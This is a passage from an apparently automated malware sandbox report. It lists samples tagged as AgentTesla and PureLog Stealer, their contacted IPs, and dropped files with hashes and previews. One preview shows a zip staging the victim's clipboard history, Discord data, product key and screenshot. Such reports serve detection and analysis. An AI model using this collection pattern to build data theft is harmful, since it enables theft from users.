                                      q86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96
                                      tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96
                                      19808bS58f.exeGet hashmaliciousAgentTeslaBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96
                                      SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6737.3783.exeGet hashmaliciousAgentTeslaBrowse
                                      • 140.82.121.3
                                      • 185.199.109.133
                                      • 185.199.110.133
                                      • 104.16.123.96

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                      Download File
                                      Process:C:\Windows\System32\svchost.exe
                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcfae260a, page size 16384, DirtyShutdown, Windows version 10.0
                                      Category:dropped
                                      Size (bytes):1310720
                                      Entropy (8bit):0.7899932745423197
                                      Encrypted:false
                                      SSDEEP:1536:DSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:DazaPvgurTd42UgSii
                                      MD5:03B48D128A5E30BA2CA071F33412BD77
                                      SHA1:2F70416346E1B4661BA7FB14558D27F3C36555A6
                                      SHA-256:2A8933DB131D865F640D7F6565DC4853BD6D3948C100F0D9F7DCCDC3BD8B3D4E
                                      SHA-512:CD5BB1D176A9DA8E2CC68CFC6D1592CC49960E4A7B7EF1E3211430098CFEA3CBD3BAAB088226ECD741B550872EBD6FA5FFE481E040221A0B35EA23D60CD9146A
                                      Malicious:false
                                      Preview:.&.... ...............X\...;...{......................0.`.....42...{5......|w.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................aN......|..................z/.......|w..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32790
                                      Entropy (8bit):5.057332133095993
                                      Encrypted:false
                                      SSDEEP:768:nLbV3IpNBQkj2Uh4iUx1frRJv5FPvlOZhxYardF/JQOdB8tAHkLNZzNKe1MlYo7h:nLbV3CNBQkj2Uh4iUx1flJnPvlOCqdRF
                                      MD5:79DCA888D6C99E400EC9E670CDBC3C7E
                                      SHA1:6C4C03035A8992B475C61E4625C72262D8441A09
                                      SHA-256:46340E6846270DB1D405C9F294CA64D027FD629E139BCED5176B8BF7139A5908
                                      SHA-512:614DA471CF8B32B14BDBADD40BB2B1CCC1258C0DA9C8AADC58A5A4C707A90A00D88255956CDDE65314D63271F00B0AEBB063F4BF69B753949F90208C3F6A8C40
                                      Malicious:false
                                      Preview:PSMODULECACHE.1...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Preview:@...e...........................................................

                                      C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D_US_user-PC_2024-07-03_UTC-5.zip

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                      Category:modified
                                      Size (bytes):664330
                                      Entropy (8bit):7.997884159883886
                                      Encrypted:true
                                      SSDEEP:12288:tHDXpH8NIPE6Tp5JuK2DpveYOw95E7lJh4sgktaI6u549J1CAKVGFAGF:tjXpP/PJkN7z95EZXftaI6u549LC0V
                                      MD5:89E73B979FCE5791EE3E4EB209B016EC
                                      SHA1:C62576AB28B23E93ED5F804742847CC631305B90
                                      SHA-256:D9AA0A6F4293207A3A2E44B5F99E51DB18A39916FA3E053CC75EEE0441D5F297
                                      SHA-512:5BBA1198B90063EC49072F08814C1BAECDB94190ECB33B4367228A52A87A9FC670B7162EADDFEE26845252D9CABD6B84C5AB54D4CA634C3F4BA73F1631C8FCA7
                                      Malicious:false
                                      Preview:PK.........j.X............<...US-(user-PC)-(2024-07-03)-(UTC-5)\clipboard_history.txtPK.........j.XO..%........3...US-(user-PC)-(2024-07-03)-(UTC-5)\discord.json.+....PK.........j.Xb.7.9...@...5...US-(user-PC)-(2024-07-03)-(UTC-5)\productkey.txt.....!.!...A.HG.y..&@.;..C..1PF.......!.(..`.....M.x....PK.........j.X."}......J..5...US-(user-PC)-(2024-07-03)-(UTC-5)\screenshot.pngl..PS[..}.@.JG@z......wD.....F)RBM..T.(....R.......R.......$..{..o.a....a=.....I..4;.r.......m......`:C;.d......[3C.|Hp.......T....=...g....._O.A=.......5c.[!.,....>.0.:..u.K........t.+.T.......kT.CD..9?._..tG.sB.K;..........9z.cb88g.ff#}Z.F../U.}.%.e...5Wg....]O...+i..M{4...o.Y.R(N..p....~...>.+7{73H5b.....J...Yt'q.......*.......;.u.....q.P..`.s......y.Z..!.u..._..\.K...T"L4.g......|.....s.....L....,.]N)z>.....3..g.a......#C..oc+.....^...i.?......~y:_...S....+4Ku..E....n......9.......c=;....W._G..rX..:s.8..y...jU.7.u.. a9<..}...{.|Y.0 .J*.......MO=..0...R...;

                                      C:\Users\user\AppData\Local\Temp\RESA945.tmp

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Jul 3 18:33:18 2024, 1st section name ".debug$S"
                                      Category:modified
                                      Size (bytes):1340
                                      Entropy (8bit):4.028504728130593
                                      Encrypted:false
                                      SSDEEP:24:H2K9o0P5PSacy/ZHMwKOZmNeI+ycuZhNQakScPNnqSed:E0P5zciZzKOZmw1ulQa3MqS+
                                      MD5:94F082876931CD6654CE048CE260295F
                                      SHA1:3E290F35973E191115FE8823BBA6AFA5A689FD7C
                                      SHA-256:F23089FC6872C728E99ABDF3C051733CC77B36D76A147F64B5BCEE3FE5B5CCC3
                                      SHA-512:5FD34DEE11725015F6B2D3D25789BDC13A835C10771143CB79EDFD9749D3D2BBE225517F964CD876EDFAEB15B4C8F8EAA939BABB0BA3EFEAA7B8FB92E29ADB88
                                      Malicious:false
                                      Preview:L...n..f.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........X....c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP................Q.G.....Y5tC...........7.......C:\Users\user~1\AppData\Local\Temp\RESA945.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.e.k.o.w.n.h.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20kjb1pw.nyx.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2itzvt3e.wy2.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dxleh4z.wuq.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3svzlauz.o0z.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rclnls5.qkf.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avdfp12q.xmg.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxloozaa.nn3.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0gitxd4.tuc.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvccjps1.4d0.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlk5d2h2.kbq.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcs3himz.ui1.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jial2c1p.2oj.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mu30yupw.omr.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oc2cd2ry.35t.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxljezbk.cwb.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgxticly.o5k.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjsl32ny.bzb.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5gxzn2x.vwl.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\autofill.json

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):1.5
                                      Encrypted:false
                                      SSDEEP:3:s:s
                                      MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                      SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                      SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                      SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                      Malicious:false
                                      Preview:null

                                      C:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.103065463071312
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryeak7YnqqcPN5Dlq5J:+RI+ycuZhNQakScPNnqX
                                      MD5:A651D29247E2D3DCD4B507593574438C
                                      SHA1:491B541F41DDC7FD5F82957344927DE2559ABA29
                                      SHA-256:E00A9FDDA601CD5D9AB5151D3E693019675A2BFC503463B44F75891130E84AD6
                                      SHA-512:4E8325539CF7C8E6F307644275C6189DA414BE70C4CBD156C3051ED28CC38286AF3AC0BB6802A8D3C209C3F4630A05D24300C13571D1FF06D2FD325720030452
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.e.k.o.w.n.h.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.e.k.o.w.n.h.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                      C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.0.cs

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text
                                      Category:dropped
                                      Size (bytes):5043
                                      Entropy (8bit):4.2500942903723855
                                      Encrypted:false
                                      SSDEEP:96:JL4W84Ji4AnzvN0OpVDUNKMiNjHJ4OY492VXyNbEqbE:OqHeVRV4oMiNjHJu/VCNIr
                                      MD5:2A829317F65FEA84EB85CB2376FA9E21
                                      SHA1:2F223EA8738F9989385E93B9C8CF0E8FC5E30700
                                      SHA-256:F99C46F447010A438586651FCDF9068394926247BF7656980FEE066B2069FE8F
                                      SHA-512:A438C35327297431DF19FE50683619F78EA0245BB8D3AA7553C376C365B927747D8CB8343FC2CFB4DE884DAD4EB6166589AFC98EBA385137BB3405998838ACE0
                                      Malicious:false
